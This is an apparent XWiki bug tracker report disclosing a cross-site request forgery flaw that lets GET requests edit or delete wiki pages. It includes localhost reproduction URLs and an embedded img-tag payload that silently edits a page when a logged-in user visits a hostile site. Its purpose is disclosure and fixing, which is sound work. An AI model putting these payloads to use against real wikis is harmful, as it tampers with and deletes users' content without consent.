Details
Description
A logged in user with "Edit" rights is allowed to edit pages with a simple GET request, which can be used for CSRF.
To reproduce (on localhost), enter the following URL:
Edit the title of Main.WebHome:
http://localhost:8080/xwiki/bin/preview/Main/WebHome?title=qqqqq&xeditaction=edit&action_save=Save+%26+View
Edit the content of Main.WebHome:
http://localhost:8080/xwiki/bin/preview/Main/WebHome?content=qwert&xeditaction=edit&action_save=Save+%26+View
Put Main.WebHome into recycle bin:
http://localhost:8080/xwiki/bin/delete/Main/WebHome?confirm=1
It is also possible to comment the change, change the Wiki syntax, redirect to another page after edit etc.
The affected user does not have to click on such URL, it is enough to visit any website containing something like:
<img src="http://localhost:8080/xwiki/bin/preview/Main/WebHome?title=p0wned&xeditaction=edit&action_save=Save+%26+View" />
Forbidding to perform such administrative tasks using GET requests will make this issue harder to exploit, but not fix it, since the attacker still might be able to inject a script to perform a POST request.
Attachments
Issue Links
- blocks
-
XWIKI-6773 Enable CSRF protection by default
-
- Closed
-